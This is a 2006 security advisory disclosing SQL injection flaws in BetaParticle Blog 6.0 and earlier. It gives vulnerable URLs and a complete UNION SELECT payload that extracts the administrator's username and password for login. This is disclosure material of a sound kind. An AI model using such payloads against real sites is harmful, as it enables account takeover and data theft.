--Security Report--
Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection
Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 18/03/06 05:27 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: BetaParticle (http://www.betaparticle.com/)
Version: 6.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL query.
Level: Critical
---
How&Example:
GET -> http://[site]/bpdir/template_permalink.asp?id=[SQLQuery]
GET -> http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=[SQLQuery]
Example ->
http://[site]/bpdir/template_gallery_detail.asp?fldGalleryID=-1+UNION+SE
LECT+null,fldAuthorUsername
,fldAuthorPassword,null,null+FROM+tblAuthor+where+fldAuthorId=1
With this example remote attacker could get admin's pass and can login from
/main.asp
--
Timeline:
* 18/03/2006: Vulnerability found.
* 18/03/2006: Contacted with vendor and waiting reply.
---
Exploit:
Click here and get exploit for this advisory
---
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum